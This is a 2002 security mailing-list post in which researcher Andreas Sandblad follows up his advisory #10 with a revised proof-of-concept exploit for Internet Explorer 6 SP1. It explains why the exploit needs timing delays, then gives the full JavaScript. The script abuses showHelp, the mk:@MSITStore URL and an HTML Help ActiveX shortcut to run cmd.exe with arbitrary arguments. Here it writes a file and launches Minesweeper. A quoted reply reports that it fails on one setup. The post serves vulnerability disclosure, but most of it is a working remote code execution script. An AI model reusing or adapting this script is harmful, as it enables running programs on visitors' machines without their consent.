Rule #1: Never use timers in IE exploits. :)
When I was developing the exploit I noticed I had to add some delay (using
a timer) because the mk:@MSITStore:C: url was not loaded directly by IE.
If the timer was set to tight I would sometimes receive the error:
"This operation can only function in HTML Help"
which is kind of natural if we try to do javascript:document.write(...)
before the mk:@MSITStore:C: url is set by IE.
In my advisory I wrote:
"If your computer is heavily loaded, then the value of the setTimeout
timer has to be increased."
Well, there can actually be several reasons why you need to increase the
timer. When I tried the exploit from another webserver (longer distance) I
noticed I had to increase the timer.
So this is what I will do. I will include an exploit using alert prompt to
simulate delay. If you can't still get it to work on IE 6 SP1 (with latest
patches), then contact me by mail so I can check if there are any other
reasons why it does not work. (You are welcome to confirm the exploit as
well.). I will only focus on fully patched IE 6 SP1, not IE 5.5.
Myself I run Win2000 pro IE 6.0.2800.1106 SP1 (latest patches). I did
verify the exploit on 3 other machines running IE 6 SP1 (XP,
Win2000pro) before posting my advisory. Thank you Hawkan, CM and
Tys0n-@IRCnet.
Sincerely,
Andreas Sandblad
I hope the exploit will not give a virus alert.
-----------------------------------------------------------
<*script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
'echo Sandblad #10 > c:/vulnerable.txt & winmine';
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
alert("Wait 1");
f("javascript:location.replace('mk:@MSITStore:C:')");
alert("Wait 2");
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>
-----------------------------------------------------------
On 8 Nov 2002 hysterix1@aol.com wrote:
> In-Reply-To: <006001c28704$a3c1ef10$a600a8c0@LocalHost>
>
> Doesnt work on my, yours or Andreas. I get a "This operation can only
> function in HTML Help". Also i since i have debugging on, I get a line 0
> permission denied error from IE.
>
> location.replace('mk:@MSITStore:C:')
>
> Only that line code is in my debugger.
>
> I use Windows2000(SP3) and IE(sp1) + recent patches for windows help
> buffer overflow(which also patched other things)
>
--
_ _
o' \,=./ `o
(o o)
-ooO--(_)--Ooo-
